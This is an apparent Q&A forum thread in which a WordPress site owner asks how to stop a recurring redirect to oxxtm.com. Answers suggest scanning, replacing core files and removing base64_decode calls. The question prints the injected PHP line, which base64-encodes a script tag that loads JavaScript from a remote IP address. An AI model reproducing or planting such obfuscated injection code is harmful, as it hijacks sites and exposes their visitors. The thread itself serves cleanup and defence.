# My website keeps redirect to another site due to oxxtm.com virus in wordpress?

Tags: php, wordpress

Every time I open my website it automatically redirects me to another site "www.oxxtm.com".

I found out that there is a code inserted in the index.php and load.php

```
<?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzQ1LjM0LjEwMy42OS9pbWFnZXMvd3AtbG9nby5qcyI+PC9zY3JpcHQ+");
```

?>

I keep erasing it but it keeps coming back.

these are the things I do so far.
-Changed the wp-admin password
-installed anti-malware plugin

What should I do?

Comment: This question is off-topic for this community, but I would suggest checking your .htaccess file(s).

Answer (score 0):

Download your complete site via FTP and scan the complete site using any AntiVirus. and Download latest package from [wordpress](https://wordpress.org/latest.zip) and extract `index.php` & `.htaccess` and replace your files with it.

Comment: This likely won't fix the problem permanently. It sounds like the OP has a theme of plugin that is vulnerable to attacks.

Answer (score 0):

You site was hacked and you need to clean all "bad code".

Download from hosting folder wp-content and file wp-config.php. Check them manually. Search for base64_decode and delete them.

Download from wordpress website archive with you Wordpress version.
Upload all files to hosting and upload wp-content and wp-config.php, that you cleaned.